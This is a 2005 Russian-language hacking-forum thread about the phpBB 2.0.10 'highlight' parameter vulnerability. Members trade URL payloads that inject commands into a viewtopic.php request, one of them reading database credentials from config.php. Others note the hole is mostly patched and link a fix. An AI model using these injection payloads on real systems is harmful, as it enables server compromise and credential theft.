ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу Проблема с phpbb 2.0.10
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Проблема с phpbb 2.0.10
  #1  
Старый 13.03.2005, 14:17
Аватар для Thrasher
Thrasher
Новичок
Регистрация: 11.03.2005
Сообщений: 15
Провел на форуме:
149484

Репутация: 1
По умолчанию Проблема с phpbb 2.0.10
Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd% 60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.
 
Ответить с цитированием

  #2  
Старый 13.03.2005, 14:23
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию
Юзай мазилку и пользуйся expl. для cookie 8)) Последнее видео качни одно снял KEZ второе max_pain.
 
Ответить с цитированием

гЫ
  #3  
Старый 13.03.2005, 16:24
Аватар для buian
buian
Новичок
Регистрация: 11.03.2005
Сообщений: 16
Провел на форуме:
13896

Репутация: 0
По умолчанию гЫ
гЫ на большиствах форумах етот эксплоит уже не пашет!! даже на тех из видио...
 
Ответить с цитированием

  #4  
Старый 13.03.2005, 16:36
Аватар для (-=util=-)
(-=util=-)
Постоянный
Регистрация: 02.12.2004
Сообщений: 352
Провел на форуме:
307649

Репутация: 67
Отправить сообщение для (-=util=-) с помощью ICQ
По умолчанию
значит patched
 
Ответить с цитированием

  #5  
Старый 13.03.2005, 18:35
Аватар для temon
temon
Участник форума
Регистрация: 06.02.2005
Сообщений: 130
Провел на форуме:
172723

Репутация: 5
По умолчанию
Цитата:
Сообщение от Thrasher  
Привет всем!
Господа, подскажите, плиз, что не так.
Прочитал про уязвимость в phpbb 2.0.10, там был приведен такой запрос: viewtopic.php?t=4&highlight=%2527.$poster=%60$cmd% 60.%2527&cmd=cd%20..;id;ls;pwd
Пробовал его выполнять, менял значения cmd. Ничего не получается, выдается только страница с соответствующим топиком. Может где ошибка в запросе, или я что делаю не так. Подскажите.
Заранее спасибо.
Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;una me%20-a;cat%20config.php|grep%20db
 
Ответить с цитированием

  #6  
Старый 14.03.2005, 13:30
Аватар для Thrasher
Thrasher
Новичок
Регистрация: 11.03.2005
Сообщений: 15
Провел на форуме:
149484

Репутация: 1
По умолчанию
Цитата:
Попробуй лучше вот так:

&highlight=%2527.$poster=%60$ls%60.%2527&ls=id;una me%20-a;cat%20config.php|grep%20db
Так тоже пробовал, не помогает.
 
Ответить с цитированием

  #7  
Старый 15.03.2005, 23:55
Аватар для hacsoft
hacsoft
Познающий
Регистрация: 14.03.2005
Сообщений: 43
Провел на форуме:
59867

Репутация: 2
Отправить сообщение для hacsoft с помощью ICQ
По умолчанию
Да, тот метод закрывается легко.
Кому интересно как, см. на моем форуме: http://hacsoft.h14.ru/phpBB2/viewtopic.php?t=94
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ